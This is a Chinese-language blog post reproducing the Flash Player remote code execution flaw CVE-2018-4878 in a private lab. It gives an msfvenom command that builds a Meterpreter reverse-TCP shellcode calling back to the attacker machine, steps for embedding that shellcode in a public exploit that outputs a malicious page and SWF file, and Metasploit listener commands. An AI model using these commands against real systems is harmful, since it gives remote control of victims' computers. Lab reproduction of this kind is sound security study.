Flash RCE 漏洞(CVE-2018-4878)复现

  • A+
所属分类:安全文章

0x01 前言

该漏洞影响 Flash Player 版本28.0.0.137以及之前的所有版本,而Adobe公司计划在当地时间2月5日紧急发布更新来修复此漏洞。从Adobe公告致谢来看,这个漏洞的野外攻击样本最早是由韩国计算机应急响应小组(KR-CERT)发现的,而KR-CERT也表示,来自朝鲜的黑客组织已经成功利用这个0Day 漏洞发起攻击。

0x02 环境

攻击机: kali 2018  (192.168.59.6)
靶机: Windows 10 x64   (192.168.59.160)
Web服务器: Windows 7 X64  (192.168.59.127)

0x03 复现过程


  1. 我们先在kali生成一个python类型的shellcode
    msfVENOM -p windows/meterpreter/reverse_tcp LHOST=192.168.59.6 LPORT=6666 -f python > /root/shellcode.txt

Flash RCE 漏洞(CVE-2018-4878)复现

  1. 替换EXP里面的shellcode
    Flash RCE 漏洞(CVE-2018-4878)复现

  2. 使用cve-2018-4878.py生成文件,我这里用的是Sublime Text 3 Ctrl+B运行python,会在本目录下生成两个文件index.html,exploit.swf
    Flash RCE 漏洞(CVE-2018-4878)复现
    Flash RCE 漏洞(CVE-2018-4878)复现

  3. 然后把这两个文件放到Web服务器里面
    Flash RCE 漏洞(CVE-2018-4878)复现

  4. 在kali的MSF里面设置监听

    msf > use exploit/multi/handler
    msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
    msf exploit(handler) > set LHOST 192.168.59.6
    msf exploit(handler) > set LPORT 6666
    msf exploit(handler) > exploit
  5. 然后使用靶机的win10 IE访问Web服务器的文件index.html
    Flash RCE 漏洞(CVE-2018-4878)复现

最后

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。


无害实验室拥有对此文章的修改和解释权如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的


本文始发于微信公众号(无害实验室sec):Flash RCE 漏洞(CVE-2018-4878)复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: